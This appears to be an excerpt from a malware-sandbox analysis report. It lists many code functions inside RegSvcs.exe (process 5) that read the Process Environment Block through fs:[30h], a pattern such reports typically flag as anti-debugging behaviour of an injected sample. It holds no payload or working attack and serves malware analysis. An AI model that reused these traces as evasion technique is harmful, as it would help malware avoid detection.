Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9240 mov eax, dword ptr fs:[00000030h]	5_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D9240 mov eax, dword ptr fs:[00000030h]	5_2_015D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01664257 mov eax, dword ptr fs:[00000030h]	5_2_01664257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169EA55 mov eax, dword ptr fs:[00000030h]	5_2_0169EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F3A1C mov eax, dword ptr fs:[00000030h]	5_2_015F3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DAA16 mov eax, dword ptr fs:[00000030h]	5_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DAA16 mov eax, dword ptr fs:[00000030h]	5_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01614A2C mov eax, dword ptr fs:[00000030h]	5_2_01614A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01614A2C mov eax, dword ptr fs:[00000030h]	5_2_01614A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D5210 mov eax, dword ptr fs:[00000030h]	5_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D5210 mov ecx, dword ptr fs:[00000030h]	5_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D5210 mov eax, dword ptr fs:[00000030h]	5_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D5210 mov eax, dword ptr fs:[00000030h]	5_2_015D5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E8A0A mov eax, dword ptr fs:[00000030h]	5_2_015E8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236 mov eax, dword ptr fs:[00000030h]	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236 mov eax, dword ptr fs:[00000030h]	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236 mov eax, dword ptr fs:[00000030h]	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236 mov eax, dword ptr fs:[00000030h]	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236 mov eax, dword ptr fs:[00000030h]	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236 mov eax, dword ptr fs:[00000030h]	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA229 mov eax, dword ptr fs:[00000030h]	5_2_015FA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169AA16 mov eax, dword ptr fs:[00000030h]	5_2_0169AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169AA16 mov eax, dword ptr fs:[00000030h]	5_2_0169AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602AE4 mov eax, dword ptr fs:[00000030h]	5_2_01602AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF mov eax, dword ptr fs:[00000030h]	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602ACB mov eax, dword ptr fs:[00000030h]	5_2_01602ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160FAB0 mov eax, dword ptr fs:[00000030h]	5_2_0160FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EAAB0 mov eax, dword ptr fs:[00000030h]	5_2_015EAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EAAB0 mov eax, dword ptr fs:[00000030h]	5_2_015EAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160D294 mov eax, dword ptr fs:[00000030h]	5_2_0160D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160D294 mov eax, dword ptr fs:[00000030h]	5_2_0160D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D52A5 mov eax, dword ptr fs:[00000030h]	5_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D52A5 mov eax, dword ptr fs:[00000030h]	5_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D52A5 mov eax, dword ptr fs:[00000030h]	5_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D52A5 mov eax, dword ptr fs:[00000030h]	5_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D52A5 mov eax, dword ptr fs:[00000030h]	5_2_015D52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F7D50 mov eax, dword ptr fs:[00000030h]	5_2_015F7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01613D43 mov eax, dword ptr fs:[00000030h]	5_2_01613D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01653540 mov eax, dword ptr fs:[00000030h]	5_2_01653540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FC577 mov eax, dword ptr fs:[00000030h]	5_2_015FC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FC577 mov eax, dword ptr fs:[00000030h]	5_2_015FC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01683D40 mov eax, dword ptr fs:[00000030h]	5_2_01683D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160F527 mov eax, dword ptr fs:[00000030h]	5_2_0160F527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160F527 mov eax, dword ptr fs:[00000030h]	5_2_0160F527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160F527 mov eax, dword ptr fs:[00000030h]	5_2_0160F527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169E539 mov eax, dword ptr fs:[00000030h]	5_2_0169E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0165A537 mov eax, dword ptr fs:[00000030h]	5_2_0165A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01604D3B mov eax, dword ptr fs:[00000030h]	5_2_01604D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01604D3B mov eax, dword ptr fs:[00000030h]	5_2_01604D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01604D3B mov eax, dword ptr fs:[00000030h]	5_2_01604D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A8D34 mov eax, dword ptr fs:[00000030h]	5_2_016A8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E3D34 mov eax, dword ptr fs:[00000030h]	5_2_015E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DAD30 mov eax, dword ptr fs:[00000030h]	5_2_015DAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0169FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01688DF1 mov eax, dword ptr fs:[00000030h]	5_2_01688DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656DC9 mov eax, dword ptr fs:[00000030h]	5_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656DC9 mov eax, dword ptr fs:[00000030h]	5_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656DC9 mov eax, dword ptr fs:[00000030h]	5_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656DC9 mov ecx, dword ptr fs:[00000030h]	5_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656DC9 mov eax, dword ptr fs:[00000030h]	5_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656DC9 mov eax, dword ptr fs:[00000030h]	5_2_01656DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015ED5E0 mov eax, dword ptr fs:[00000030h]	5_2_015ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015ED5E0 mov eax, dword ptr fs:[00000030h]	5_2_015ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016035A1 mov eax, dword ptr fs:[00000030h]	5_2_016035A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A05AC mov eax, dword ptr fs:[00000030h]	5_2_016A05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A05AC mov eax, dword ptr fs:[00000030h]	5_2_016A05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01601DB5 mov eax, dword ptr fs:[00000030h]	5_2_01601DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01601DB5 mov eax, dword ptr fs:[00000030h]	5_2_01601DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01601DB5 mov eax, dword ptr fs:[00000030h]	5_2_01601DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D2D8A mov eax, dword ptr fs:[00000030h]	5_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D2D8A mov eax, dword ptr fs:[00000030h]	5_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D2D8A mov eax, dword ptr fs:[00000030h]	5_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D2D8A mov eax, dword ptr fs:[00000030h]	5_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D2D8A mov eax, dword ptr fs:[00000030h]	5_2_015D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602581 mov eax, dword ptr fs:[00000030h]	5_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602581 mov eax, dword ptr fs:[00000030h]	5_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602581 mov eax, dword ptr fs:[00000030h]	5_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602581 mov eax, dword ptr fs:[00000030h]	5_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82 mov eax, dword ptr fs:[00000030h]	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160FD9B mov eax, dword ptr fs:[00000030h]	5_2_0160FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160FD9B mov eax, dword ptr fs:[00000030h]	5_2_0160FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160AC7B mov eax, dword ptr fs:[00000030h]	5_2_0160AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477 mov eax, dword ptr fs:[00000030h]	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160A44B mov eax, dword ptr fs:[00000030h]	5_2_0160A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F746D mov eax, dword ptr fs:[00000030h]	5_2_015F746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166C450 mov eax, dword ptr fs:[00000030h]	5_2_0166C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0166C450 mov eax, dword ptr fs:[00000030h]	5_2_0166C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160BC2C mov eax, dword ptr fs:[00000030h]	5_2_0160BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A740D mov eax, dword ptr fs:[00000030h]	5_2_016A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A740D mov eax, dword ptr fs:[00000030h]	5_2_016A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A740D mov eax, dword ptr fs:[00000030h]	5_2_016A740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691C06 mov eax, dword ptr fs:[00000030h]	5_2_01691C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656C0A mov eax, dword ptr fs:[00000030h]	5_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656C0A mov eax, dword ptr fs:[00000030h]	5_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656C0A mov eax, dword ptr fs:[00000030h]	5_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656C0A mov eax, dword ptr fs:[00000030h]	5_2_01656C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016914FB mov eax, dword ptr fs:[00000030h]	5_2_016914FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656CF0 mov eax, dword ptr fs:[00000030h]	5_2_01656CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656CF0 mov eax, dword ptr fs:[00000030h]	5_2_01656CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01656CF0 mov eax, dword ptr fs:[00000030h]	5_2_01656CF0
